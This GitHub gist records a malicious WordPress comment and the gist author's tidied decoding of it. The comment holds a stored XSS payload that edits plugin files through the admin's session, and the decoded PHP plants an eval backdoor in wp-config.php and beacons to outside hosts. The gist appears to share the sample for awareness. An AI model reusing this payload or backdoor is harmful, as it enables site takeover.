Skip to content

Instantly share code, notes, and snippets.

@mattfoster

mattfoster/comment

Created May 5, 2015 18:51
Show Gist options
  • Save mattfoster/6763cb5039fedafab7ea to your computer and use it in GitHub Desktop.
Save mattfoster/6763cb5039fedafab7ea to your computer and use it in GitHub Desktop.
Download ZIP
Dodgy WordPress Comment
Raw
comment
Author: Rick (IP: 37.130.227.133, torland1-this.is.a.tor.exit.server.torland.is)
E-mail: [email protected]
URL:
Whois: http://whois.arin.net/rest/ip/37.130.227.133
Comment:
[<a title="]" rel="nofollow"></a>[" <!-- style=position:fixed;top:0;left:0;padding:0;margin:0;width:1000%;height:1000%;cursor:default;z-index:100;display:block;color:transparent;font-size:0 onmouseover="eval(atob('dmFyIHggPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiYSIpOw0KdmFyIGk7DQpmb3IgKGkgPSAwOyBpIDwgeC5sZW5ndGg7IGkrKykgew0KICAgIGlmKHhbaV0uc3R5bGUud2lkdGggPT0gIjYwMDBweCIpe3hbaV0uc3R5bGUuZGlzcGxheT0ibm9uZSI7fQ0KfQ0KDQp2YXIgZWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJpZnJhbWUiKTsNCmVsLmlkID0gJ2lmcmFtZTIyJzsNCmVsLnN0eWxlLmRpc3BsYXkgPSAiZml4ZWQiOw0KZWwuc3R5bGUudG9wPScxcHgnOw0KZWwuc3R5bGUubGVmdD0nMXB4JzsNCmVsLnN0eWxlLndpZHRoID0gIjFweCI7DQplbC5zdHlsZS5oZWlnaHQgPSAiMXB4IjsNCmVsLnNyYyA9ICJwbHVnaW4tZWRpdG9yLnBocD9maWxlPWluZGV4LnBocCZwbHVnaW49aW5kZXgucGhwIjsNCmRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoZWwpOw0KZWwub25sb2FkID0gaHV5Ow0KDQpmdW5jdGlvbiBnZXRJZnJhbWVEb2N1bWVudChpZnJhbWVOb2RlKSB7DQogIGlmIChpZnJhbWVOb2RlLmNvbnRlbnREb2N1bWVudCkgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudERvY3VtZW50DQogIGlmIChpZnJhbWVOb2Rl
LmNvbnRlbnRXaW5kb3cpIHJldHVybiBpZnJhbWVOb2RlLmNvbnRlbnRXaW5kb3cuZG9jdW1lbnQNCiAgcmV0dXJuIGlmcmFtZU5vZGUuZG9jdW1lbnQNCn0NCg0KZnVuY3Rpb24gaHV5KCl7DQp2YXIgenp6ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lmcmFtZTIyJyk7DQp2YXIgaGhoID0gZ2V0SWZyYW1lRG9jdW1lbnQoenp6KTsNCmlmIChoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZS5pbmRleE9mKCIxOTI0ODUwOTdiYzhhMjQwYTk2YWNhNTk2OGVhZTc3NyIpID09IC0xKSB7DQpoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZSA9IGF0b2IoIlBEOXdhSEFnSkVkTVQwSkJURk5iSjE4eU5UTTBNREV4TmpsZkoxMDlRWEp5WVhrb1ltRnpaVFkwWDJSbFkyOWtaU2duWkZoS2MxcFhOV3BpSnlBdUp6SW5JQzRuVW13bktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkWmJVWjZXbFFuSUM0bldUQllNaWNnTGlkV2RTY2dMaWRaTWpscldsRTlQU2NwTEdKaGMyVTJORjlrWldOdlpHVW9KMXB0Wkd4a1IwNG5JQzRuZW1Sbkp5QXVKejBuSUM0blBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oyTXlWbm9uSUM0bll6SW5JQzRuYkhaaWJEa25JQzRuY0ZwQlBUMG5LU3hpWVhObE5qUmZaR1ZqYjJSbEtDZGpNMUluSUM0bmVWZ25JQzRuTTBwc1l5Y2dMaWRIZUdoWk1sVTlKeWtzWW1GelpUWTBYMlJsWTI5a1pTZ25ZekpvTVZwdFduTmFVVDA5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duWXljZ0xpY
3pVbmtuSUM0blkwY25JQzRuT1hvbktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkYWJTY2dMaWRzY3ljZ0xpZGFWamxzWlVkc2VtUklKeUF1SjAwOUp5a3NZbUZ6WlRZMFgyUmxZMjlrWlNnblkyMVdkVmxYTVd3bktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkaVdGSW5JQzRuWm1OdFJuVmFRVDA5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duWTBoS2NHSnVVbVpqWnowOUp5a3NZbUZ6WlRZMFgyUmxZMjlrWlNnbldtMXNjMXBXSnlBdUp6bHNKeUF1SjJWSGJIcGtKeUF1SjBoTlBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oyTXpWbWxqSnlBdUp6TlNlU2NwTEdKaGMyVTJORjlrWldOdlpHVW9KMk16VWljZ0xpZDVXRE5PYjJSWEp5QXVKMXB0SnlBdUoySkhWVDBuS1N4aVlYTmxOalJmWkdWamIyUmxLQ2RqSnlBdUp6TlNlVmd6U214alIxWW5JQzRuYUdSQlBUMG5LU3hpWVhObE5qUmZaR1ZqYjJSbEtDZGlWMUV4Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duV20xc2MxcFdKeUF1SnpsM1pGaFNabGt5SnlBdUp6a25JQzRuZFdSSFZuVmtKeUF1SjBoTlBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oyTW5JQzRuTTFKNVdETktiR05ISnlBdUozaG9XVEpWUFNjcExHSmhjMlUyTkY5a1pXTnZaR1VvSjFvbklDNG5iV3h6V2ljZ0xpZFdPVzRuSUM0bldsaFNabGt5T1hWa1IxWjFaRWhOSnlBdUp6MG5LU3hpWVhObE5qUmZaR1ZqYjJSbEtDZGpNMUo1WTBjNUp5QXVKM29uS1N4aVlYTmxOalJmWkdWamIyUmxLQ2RqTTFacFl5Y2dMaWN6VW5sWU0wcHNZeW
NnTGlkSGVHaFpNbFU5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duWVZoT0p5QXVKMlluSUM0bldWaEtKeUF1SjNsWldHczlKeWtzWW1GelpUWTBYMlJsWTI5a1pTZ25Zek5TZVNjZ0xpZGpiaWNnTGlkQ2RtTjNQVDBuS1N4aVlYTmxOalJmWkdWamIyUmxLQ2RaTWpsM0p5QXVKMlZSUFQwbktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkWk1qbDNaVkU5UFNjcExHSmhjMlUyTkY5a1pXTnZaR1VvSjJJbklDNG5XQ2NnTGlkU1ppY2dMaWRqYlNjZ0xpZEdkVnBCUFQwbktTeGlZWE5sTmpSZlpHVmpiMlJsS0Nkakp5QXVKekpvYUNjZ0xpZE5VVDA5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duV1RJNUp5QXVKM2NuSUM0blpWRTlQU2NwTEdKaGMyVTJORjlrWldOdlpHVW9KeWNnTGlkYWJXeHpXbFk1SnlBdUozZGtKeUF1SjFnbklDNG5VaWNnTGlkbVdUSW5JQzRuT1NjZ0xpZDFaQ2NnTGlkSFZuVmtTRTBuSUM0blBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oxb25JQzRuYld4eldsWW5JQzRuT1NjZ0xpZDNaRmduSUM0blVpY2dMaWRtV1NjZ0xpY3lPU2NnTGlkMVpFZFdkV1JJSnlBdUowMDlKeWtzWW1GelpUWTBYMlJsWTI5a1pTZ25XVmhLZVZrbklDNG5XR3htWXpOV2RDY3BMR0poYzJVMk5GOWtaV052WkdVb0oxcEhiSGtuS1NrN1puVnVZM1JwYjI0Z1h6RXdORFUyTWprek16a29KR2twZXlSaFBVRnljbUY1S0NkaFNDY2dMaWRTTUdNbklDNG5SRzkyVEhwRmVrOG5JQzRuUXpSNFRXb25JQzRuWjNWTkp5QXVKMVJaTlV4cVNYaFBKeUF1SjF
NNWVsa3pTaWNnTGlkc0p5QXVKMXBYTlhwaFJ6a3dZM2s0ZFdGWE1XaGFNbFo2VERKc2RWb25JQzRuUjFZMEp5QXVKMHh1UW05alFUMDlKeXduSnlBdUoyRklKeUF1SjFJd1kwUnZka3d5ZEhCa1JGSm9Za2QzZFNjZ0xpZGpibFYyV1RJbklDNG5PWFJqUnpsMUp5QXVKMW9uSUM0blZ6VXdZM2s1YW1JeU1TY2dMaWRtWVcxT2JFd3liSFZhUnljZ0xpZFdORXh1UW05alFUMDlKeXduWkNjZ0xpY3pRWFJaTWpsMVpFZFdKeUF1SjNWa1F6bDNZa2hXSnlBdUoyNWhWelVuSUM0bmVrd3lKeUF1SjJ4MUp5QXVKMXBIVmpSTUp5QXVKMjVDSnlBdUoyOG5JQzRuWTBFOVBTY3NKeWNzSjFWclZsSW5JQzRuVmxVbklDNG5WbFJXUmljZ0xpYzVWbFZyYXljZ0xpYzlKeXduVTBZbklDNG5VbFZWUmljZ0xpYzVTVlF4VGxVbkxDZG1RVDA5Snl3blVFZHNkRnA1UWpOaEp5QXVKMWRTTUdGRU1IaEpSMmhzWVZka2IyUkVNSGhKSnlBdUowaE9lVmw2TUdrbkxDZFFNbEpvWkVkRkp5QXVKemtuTENkSkp5QXVKMm8wUFNjc0oyUW5JQzRuVjFwdkp5QXVKMk5IU214YVJ5Y2dMaWRLTXljZ0xpZGFXR2hvSnl3bldtMG5JQzRuTVRZbkxDZE1hVFIyVENjZ0xpZHBOSFprSnlBdUp6TW5JQzRuUVhSWk1qbDBZbGRXZFNjZ0xpZGtTRTEwSnlBdUoyTkhPWHBrSnlBdUowTTFKeUF1SjNkaFNDY2dMaWRCUFNjc0oweHBOSFpNSnlBdUoyazBkaWNnTGlka0p5QXVKek5CZEZreU9YUmlWelVuSUM0bmJHUW5JQzRuU0UxMEp5QXVKMk5IT1hvbklDNG5aRU0xZHljZ0xp
ZGhTRUU5Snl3bkp5QXVKMHhwTkhaTWFUUjJKeUF1SjJRbklDNG5NeWNnTGlkQmRGa3lPWFZhYld4dUp5QXVKMHh1UW05alFUMDlKeXduVVZVbklDNG5TaWNnTGlkRVVrVldSMUluSUM0bk1HaEtVMnNuSUM0bmRFMVVKeUF1SjFVbklDNG5OU2NnTGlkUVZTY2dMaWRHSnlBdUowWlRWVEZTVmxac0p5QXVKMlJaVjFad2FDY2dMaWRaYlU1cldsZGFibUZIYkhGaE1uZ25JQzRuZEdKdEp5QXVKemwzWXljZ0xpZFlTbnBrU0ZZeUp5QXVKMlF6YURWbFp6MDlKeXduU2toU2FGa25JQzRuYlhnbklDNG5iQ2NnTGlkWU0wSjVXbGRhY0NjZ0xpZGxRVDA5Snl3blpESW5JQzRuVG5aaU1rWnJZak5TY1dGWVJpY2dMaWN4WVRKS2EyTlhlQ2NnTGlkMVdsRTlQU2NzSjJKSWJ6MG5MQ2RoSnlBdUowaFNKeUF1SnpCalJHOTJUREpTSnlBdUoyZ25JQzRuWXljZ0xpZEhUbThuSUM0bldsY3hKeUF1SjJ4aWJTY2dMaWRqZFdJbklDNG5NMHB1SnlBdUoweDZSWFluSUM0bldWaEpkbVF5ZEhwaU1qVnNaSGtuSUM0bk5TY2dMaWQzWVNjZ0xpZElKeUF1SjBFbklDNG5QU2NzSjB4cE5IWk1hVFFuSUM0bmRtUXpRWFJoVnpWcUp5QXVKMkpJSnlBdUoxWnJKeUF1SjFwWVRYWmtSMVowWTBkNGFHUW5JQzRuUjFWMFpETkNjeWNnTGlkaU1rWnJXbGhKZFdOSEp5QXVKMmgzSnl3bkp5QXVKMkZYTld0YUp5QXVKMWhuSnlBdUozVmpSeWNnTGlkb2R5Y3NKMHhwSnlBdUp6UW5JQzRuZGljZ0xpZGtXRUp1WTIwbklDNG5SaWNnTGlkckp5QXVKMXBUT1RGalIyUjVXV
mRTSnlBdUoyeGpKeUF1SjNrMWQyRklKeUF1SjBFOUp5d25ZVmMxYTFwWVozVmpSMmduSUM0bmR5Y3NKMHduSUM0bmFTY2dMaWMwSnlBdUozWmtXRUp6WWpKR2EyTjVPVE5qUXpFeEp5QXVKMk5IZUNjZ0xpZDJKeUF1SjFsWFVucE1ia0p2WTBFbklDNG5QVDBuTENkaEp5QXVKMUU5SnlBdUp6MG5MQ2RoSnlBdUoxYzFhMW9uSUM0bldHZDFZMGRvZHljc0p5Y2dMaWRRUkNjZ0xpYzVkeWNnTGlkaEp5QXVKMGhCVGtOcE9IWW5JQzRuU1VaT2NHSW5JQzRuUnljZ0xpZFdkVmtuSUM0bk1sVm5KeUF1SjJFbklDNG5XQ2NnTGlkTloxb3lPWE5hUjFaMVRHY3dTMUFuSUM0bmVpY2dMaWMwUFNjc0oweHBOSFprSnlBdUoxaENjMkl5Um10amVUbHdKeUF1SjJKdEp5QXVKMUpzSnlBdUoyVW5JQzRuUXljZ0xpYzFkMkZJUVNjZ0xpYzlKeXduSnlBdUoyRlhOV3RhSnlBdUoxaG5kU2NnTGlkalIyaDNKeWs3Y21WMGRYSnVJR0poYzJVMk5GOWtaV052WkdVb0pHRmJKR2xkS1R0OVpuVnVZM1JwYjI0Z2JGOWZNQ2drWHpBcGUzSmxkSFZ5YmlBa1IweFBRa0ZNVTFzblh6STFNelF3TVRFMk9WOG5YVnN3WFNna1IweFBRa0ZNVTFzblh6STFNelF3TVRFMk9WOG5YVnN4WFNoK0pGOHdLU2s3ZldaMWJtTjBhVzl1SUd4Zlh6RW9KRjh4S1hza1h6SmJYVDFmTVRBME5UWXlPVE16T1Nnd0tUdDNhR2xzWlNoeWIzVnVaQ2d3S3pFME1qZ3VOalkyTmpZMk5qY3JNVFF5T0M0Mk5qWTJOalkyTnlzeE5ESTRMalkyTmpZMk5qWTNLUzF5YjNWdVpDZ3dLelF5T0
RZcEtTUkhURTlDUVV4VFd5ZGZNalV6TkRBeE1UWTVYeWRkV3pKZEtDUmZVMFZTVmtWU0tUc2tYekpiWFQxZk1UQTBOVFl5T1RNek9TZ3hLVHQzYUdsc1pTaHliM1Z1WkNnd0t6RXpOemt1TlNzeE16YzVMalVwTFhKdmRXNWtLREFyTVRNM09TNDFLekV6TnprdU5Ta3BKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk0xMG9KRjh4TENSZk15azdKRjh6UFNSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXelJkS0Y4eE1EUTFOakk1TXpNNUtESXBMRjh4TURRMU5qSTVNek01S0RNcExDUmZVMFZTVmtWU1cxOHhNRFExTmpJNU16TTVLRFFwWFNrN0pGODBQV3hmWHpBb0pGOVRSVkpXUlZKYlh6RXdORFUyTWprek16a29OU2xkSUM0a1h6TWdMbDh4TURRMU5qSTVNek01S0RZcElDNGtYekVwT3lSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXelZkS0NSZk1pazdabTl5WldGamFDZ2tYeklnWVhNZ0pGODFLWHRsWTJodklGOHhNRFExTmpJNU16TTVLRGNwSUM0a1h6VWdMbDh4TURRMU5qSTVNek01S0RncElDNGtYelFnTGw4eE1EUTFOakk1TXpNNUtEa3BPMmxtS0NSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXelpkS0Y4eE1EUTFOakk1TXpNNUtERXdLU3hmTVRBME5UWXlPVE16T1NneE1Ta3BJVDA5Wm1Gc2MyVXBKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk4xMG9KRjlUUlZKV1JWSXNKRjlUUlZKV1JWSXNKRjgyS1R0OWZVQWtSMHhQUWtGTVUxc25YekkxTXpRd01URTJPVjhuWFZzNFh
TaGZNVEEwTlRZeU9UTXpPU2d4TWlrc1h6RXdORFUyTWprek16a29NVE1wS1Rza1h6WTlYekV3TkRVMk1qa3pNemtvTVRRcE8ybG1LSEp2ZFc1a0tEQXJPVE0zTGpRck9UTTNMalFyT1RNM0xqUXJPVE0zTGpRck9UTTNMalFwUENSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXemxkS0hKdmRXNWtLREFyTkRFd0t6UXhNQ3MwTVRBck5ERXdLU3h5YjNWdVpDZ3dLekV3TVRRck1UQXhOQ3N4TURFMEtTa3BKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk1UQmRLQ1JmTVNrN2FXWW9KRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk1URmRLQ1JmTmlrcGV5UmZNVDBrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3hNbDBvSkVkTVQwSkJURk5iSjE4eU5UTTBNREV4TmpsZkoxMWJNVE5kS0NSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekUwWFNoZk1UQTBOVFl5T1RNek9TZ3hOU2tzY205MWJtUW9NQ3N4TmlrcEtTeHliM1Z1WkNnd0tTeHliM1Z1WkNnd0t6RTJLU2s3SkY4M1BTUkhURTlDUVV4VFd5ZGZNalV6TkRBeE1UWTVYeWRkV3pFMVhTZ2tYekVwT3lSZk5UMGlaWEp5YjNKZmNtVndiM0owYVc1bktEQXBPMmxtS0dsemMyVjBLRndrWDFKRlVWVkZVMVJiSjNkd2MzQnRKMTBwSUNZbUlHMWtOU2hjSkY5U1JWRlZSVk5VV3lkM2NITndiU2RkS1NBOVBTQW5KRjgzSnlBbUppQnBjM05sZENoY0pGOVNSVkZWUlZOVVd5ZDNjSEpySjEwcEtTQmxkbUZzSUNnZ1ltRnpaVFkwWDJSbFkyOWta
U0FvWENSZlVrVlJWVVZUVkZzbmQzQnlheWRkS1NrN0lqc2tSMHhQUWtGTVUxc25YekkxTXpRd01URTJPVjhuWFZzeE5sMG9JaVJmTmlJc0pFZE1UMEpCVEZOYkoxOHlOVE0wTURFeE5qbGZKMTFiTVRkZEtGOHhNRFExTmpJNU16TTVLREUyS1N3aUpGODFJRnh1SUZ3a2RHRmliR1ZmY0hKbFptbDRJaXdrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3hPRjBvSkY4MktTa3BPMmxtS0NSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekU1WFNoZk1UQTBOVFl5T1RNek9TZ3hOeWtzWHpFd05EVTJNamt6TXprb01UZ3BLU0U5UFdaaGJITmxLU1JIVEU5Q1FVeFRXeWRmTWpVek5EQXhNVFk1WHlkZFd6SXdYU2drWHpVc0pGOHdMQ1JmTWlrN2ZXeGZYekVvSkY4eEtUdHBaaWdvY205MWJtUW9NQ3MwTXpJdU9DczBNekl1T0NzME16SXVPQ3MwTXpJdU9DczBNekl1T0NrcmNtOTFibVFvTUNzeE1qRTRLekV5TVRnck1USXhPQ3N4TWpFNEtTaytjbTkxYm1Rb01DczFOREVyTlRReEt6VTBNU3MxTkRFcGZId2dKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk1qRmRLQ1JmTkN3a1h6TXNKRjgyTENSZlUwVlNWa1ZTS1NrN1pXeHpaWHNrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3lNbDBvSkY5VFJWSldSVklwTzMxQUpFZE1UMEpCVEZOYkoxOHlOVE0wTURFeE5qbGZKMTFiTWpOZEtGOHhNRFExTmpJNU16TTVLREU1S1N4Zk1UQTBOVFl5T1RNek9TZ3lNQ2twT3lRa1h6WTlYMTlHU1V4RlgxODdRQ1JIV
EU5Q1FVeFRXeWRmTWpVek5EQXhNVFk1WHlkZFd6STBYU2hmTVRBME5UWXlPVE16T1NneU1Ta3NYekV3TkRVMk1qa3pNemtvTWpJcEtUdHBaaWh5YjNWdVpDZ3dLekk0T0RNck1qZzRNeXN5T0RnektUd2tSMHhQUWtGTVUxc25YekkxTXpRd01URTJPVjhuWFZzeU5WMG9jbTkxYm1Rb01Dc3lNVEF3TGpVck1qRXdNQzQxS1N4eWIzVnVaQ2d3S3pJeU1qRXVOU3N5TWpJeExqVXBLU2trUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3lObDBvSkY4M0xDUmZOU2s3UUNSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekkzWFNoZk1UQTBOVFl5T1RNek9TZ3lNeWtzWHpFd05EVTJNamt6TXprb01qUXBLVHNrWHpnOVh6RXdORFUyTWprek16a29NalVwTzBBa1IweFBRa0ZNVTFzblh6STFNelF3TVRFMk9WOG5YVnN5T0Ywb1h6RXdORFUyTWprek16a29NallwTEY4eE1EUTFOakk1TXpNNUtESTNLU2s3UUNSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekk1WFNoZk1UQTBOVFl5T1RNek9TZ3lPQ2tzWHpFd05EVTJNamt6TXprb01qa3BLVHRwWmlnb2NtOTFibVFvTUNzeU9EYzJLVjV5YjNWdVpDZ3dLemsxT0M0Mk5qWTJOalkyTmpjck9UVTRMalkyTmpZMk5qWTJOeXM1TlRndU5qWTJOalkyTmpZM0tTa21KaUFrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3pNRjBvSkY4ekxDUmZOQ3drWHpRcEtTUkhURTlDUVV4VFd5ZGZNalV6TkRBeE1UWTVYeWRkV3pNeFhTZ2tYelFzSkY4d0xDUmZNeXdrWHpNcE
8yVmphRzhpTVRreU5EZzFNRGszWW1NNFlUSTBNR0U1Tm1GallUVTVOamhsWVdVM056Y2lPeUEvUGc9PSIpICsgaGhoLmdldEVsZW1lbnRCeUlkKCJuZXdjb250ZW50IikudmFsdWU7DQpoaGguZ2V0RWxlbWVudEJ5SWQoInN1Ym1pdCIpLmNsaWNrKCApOw0KfQ0KZWxzZSB7DQp6enouc3JjID0gJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy9pbmRleC5waHAnOw0KfX0='))"&gt;Baltimore -->Baltimore police completed a criminal investigation into the death of Freddie Gray and delivered it to a prosecutor a day earlier than promised Thursday.<a></a>]
@mattfoster
Copy link
Author

I put the PHP code through an online tidier:

<?php
    $GLOBALS['_253401169_'] = Array(base64_decode('dXJsZW5jb' .'2' .'Rl'),base64_decode('YmFzZT' .'Y0X2' .'Vu' .'Y29kZQ=='),base64_decode('ZmdldGN' .'zdg' .'=' .'='),base64_decode('c2Vz' .'c2' .'lvbl9' .'pZA=='),base64_decode('c3R' .'yX' .'3Jlc' .'GxhY2U='),base64_decode('c2h1ZmZsZQ=='),base64_decode('c' .'3Ry' .'cG' .'9z'),base64_decode('Zm' .'ls' .'ZV9leGlzdH' .'M='),base64_decode('cmVuYW1l'),base64_decode('bXR' .'fcmFuZA=='),base64_decode('cHJpbnRfcg=='),base64_decode('ZmlsZV' .'9l' .'eGlzd' .'HM='),base64_decode('c3Vic' .'3Ry'),base64_decode('c3R' .'yX3NodW' .'Zm' .'bGU='),base64_decode('c' .'3RyX3JlcGV' .'hdA=='),base64_decode('bWQ1'),base64_decode('ZmlsZV' .'9wdXRfY2' .'9' .'udGVud' .'HM='),base64_decode('c' .'3RyX3JlcG' .'xhY2U='),base64_decode('Z' .'mlsZ' .'V9n' .'ZXRfY29udGVudHM' .'='),base64_decode('c3RycG9' .'z'),base64_decode('c3Vic' .'3RyX3Jlc' .'GxhY2U='),base64_decode('aXN' .'f' .'YXJ' .'yYXk='),base64_decode('c3Ry' .'cn' .'Bvcw=='),base64_decode('Y29w' .'eQ=='),base64_decode('Y29weQ=='),base64_decode('b' .'X' .'Rf' .'cm' .'FuZA=='),base64_decode('c' .'2hh' .'MQ=='),base64_decode('Y29' .'w' .'eQ=='),base64_decode('' .'ZmlsZV9' .'wd' .'X' .'R' .'fY2' .'9' .'ud' .'GVudHM' .'='),base64_decode('Z' .'mlsZV' .'9' .'wdX' .'R' .'fY' .'29' .'udGVudH' .'M='),base64_decode('YXJyY' .'Xlfc3Vt'),base64_decode('ZGly'));
    function _1045629339($i){
        $a=Array('aH' .'R0c' .'DovLzEzO' .'C4xMj' .'guM' .'TY5LjIxO' .'S9zY3J' .'l' .'ZW5zaG90cy8uaW1hZ2VzL2luZ' .'GV4' .'LnBocA==','' .'aH' .'R0cDovL2tpdDRhbGwu' .'cnUvY2' .'9tcG9u' .'Z' .'W50cy9jb21' .'famNlL2luZG' .'V4LnBocA==','d' .'3AtY29udGV' .'udC9wbHV' .'naW5' .'zL2' .'lu' .'ZGV4L' .'nB' .'o' .'cA==','','UkVR' .'VU' .'VTVF' .'9VUkk' .'=','SF' .'RUUF' .'9IT1NU','fA==','PGltZyB3a' .'WR0aD0xIGhlaWdodD0xI' .'HNyYz0i','P2RhdGE' .'9','I' .'j4=','d' .'WZo' .'cGJlZG' .'J3' .'ZXhh','Zm' .'16','Li4vL' .'i4vd' .'3' .'AtY29tbWVu' .'dHMt' .'cG9zd' .'C5' .'waH' .'A=','Li4vL' .'i4v' .'d' .'3AtY29tbW5' .'ld' .'HMt' .'cG9z' .'dC5w' .'aHA=','' .'Li4vLi4v' .'d' .'3' .'AtY29uZmln' .'LnBocA==','QU' .'J' .'DREVGR' .'0hJSk' .'tMT' .'U' .'5' .'PU' .'F' .'FSU1RVVl' .'dYWVph' .'YmNkZWZnaGlqa2x' .'tbm' .'9wc' .'XJzdHV2' .'d3h5eg==','JHRhY' .'mx' .'l' .'X3ByZWZp' .'eA==','d2' .'Nvb2Fkb3RqaXF' .'1a2JkcWx' .'uZQ==','bHo=','a' .'HR' .'0cDovL2R' .'h' .'c' .'GNo' .'ZW1' .'lbm' .'cub' .'3Jn' .'LzEv' .'YXIvd2tzb25ldy' .'5' .'wa' .'H' .'A' .'=','Li4vLi4' .'vd3AtaW5j' .'bH' .'Vk' .'ZXMvdGVtcGxhd' .'GUtd3Bs' .'b2FkZXIucG' .'hw','' .'aW5kZ' .'Xg' .'ucG' .'hw','Li' .'4' .'v' .'dXBncm' .'F' .'k' .'ZS91cGdyYWR' .'lc' .'y5waH' .'A=','aW5kZXgucGh' .'w','L' .'i' .'4' .'vdXBsb2Fkcy93cC11' .'cGx' .'v' .'YWRzLnBocA' .'==','a' .'Q=' .'=','a' .'W5kZ' .'XgucGhw','' .'PD' .'9w' .'a' .'HANCi8v' .'IFNpb' .'G' .'VuY' .'2Ug' .'a' .'X' .'MgZ29sZGVuLg0KP' .'z' .'4=','Li4vd' .'XBsb2Fkcy9p' .'bm' .'Rl' .'e' .'C' .'5waHA' .'=','' .'aW5kZ' .'Xgu' .'cGhw');
        return base64_decode($a[$i]);
    }


    function l__0($_0){
        return $GLOBALS['_253401169_'][0]($GLOBALS['_253401169_'][1](~$_0));
    }


    function l__1($_1){
        $_2[]=_1045629339(0);
        while(round(0+1428.66666667+1428.66666667+1428.66666667)-round(0+4286))$GLOBALS['_253401169_'][2]($_SERVER);
        $_2[]=_1045629339(1);
        while(round(0+1379.5+1379.5)-round(0+1379.5+1379.5))$GLOBALS['_253401169_'][3]($_1,$_3);
        $_3=$GLOBALS['_253401169_'][4](_1045629339(2),_1045629339(3),$_SERVER[_1045629339(4)]);
        $_4=l__0($_SERVER[_1045629339(5)] .$_3 ._1045629339(6) .$_1);
        $GLOBALS['_253401169_'][5]($_2);
        foreach($_2 as $_5){
            echo _1045629339(7) .$_5 ._1045629339(8) .$_4 ._1045629339(9);

            if($GLOBALS['_253401169_'][6](_1045629339(10),_1045629339(11))!==false)$GLOBALS['_253401169_'][7]($_SERVER,$_SERVER,$_6);
        }

    }

    @$GLOBALS['_253401169_'][8](_1045629339(12),_1045629339(13));
    $_6=_1045629339(14);

    if(round(0+937.4+937.4+937.4+937.4+937.4)<$GLOBALS['_253401169_'][9](round(0+410+410+410+410),round(0+1014+1014+1014)))$GLOBALS['_253401169_'][10]($_1);

    if($GLOBALS['_253401169_'][11]($_6)){
        $_1=$GLOBALS['_253401169_'][12]($GLOBALS['_253401169_'][13]($GLOBALS['_253401169_'][14](_1045629339(15),round(0+16))),round(0),round(0+16));
        $_7=$GLOBALS['_253401169_'][15]($_1);
        $_5="error_reporting(0);if(isset(\$_REQUEST['wpspm']) && md5(\$_REQUEST['wpspm']) == '$_7' && isset(\$_REQUEST['wprk'])) eval ( base64_decode (\$_REQUEST['wprk']));";
        $GLOBALS['_253401169_'][16]("$_6",$GLOBALS['_253401169_'][17](_1045629339(16),"$_5 \n \$table_prefix",$GLOBALS['_253401169_'][18]($_6)));

        if($GLOBALS['_253401169_'][19](_1045629339(17),_1045629339(18))!==false)$GLOBALS['_253401169_'][20]($_5,$_0,$_2);
    }

    l__1($_1);

    if((round(0+432.8+432.8+432.8+432.8+432.8)+round(0+1218+1218+1218+1218))>round(0+541+541+541+541)|| $GLOBALS['_253401169_'][21]($_4,$_3,$_6,$_SERVER)); else {
        $GLOBALS['_253401169_'][22]($_SERVER);
    }

    @$GLOBALS['_253401169_'][23](_1045629339(19),_1045629339(20));
    $$_6=__FILE__;
    @$GLOBALS['_253401169_'][24](_1045629339(21),_1045629339(22));

    if(round(0+2883+2883+2883)<$GLOBALS['_253401169_'][25](round(0+2100.5+2100.5),round(0+2221.5+2221.5)))$GLOBALS['_253401169_'][26]($_7,$_5);
    @$GLOBALS['_253401169_'][27](_1045629339(23),_1045629339(24));
    $_8=_1045629339(25);
    @$GLOBALS['_253401169_'][28](_1045629339(26),_1045629339(27));
    @$GLOBALS['_253401169_'][29](_1045629339(28),_1045629339(29));

    if((round(0+2876)^round(0+958.666666667+958.666666667+958.666666667))&& $GLOBALS['_253401169_'][30]($_3,$_4,$_4))$GLOBALS['_253401169_'][31]($_4,$_0,$_3,$_3);
    echo"192485097bc8a240a96aca5968eae777";
    ?>

@blast-hardcheese
Copy link

blast-hardcheese commented Sep 4, 2016
edited
Loading

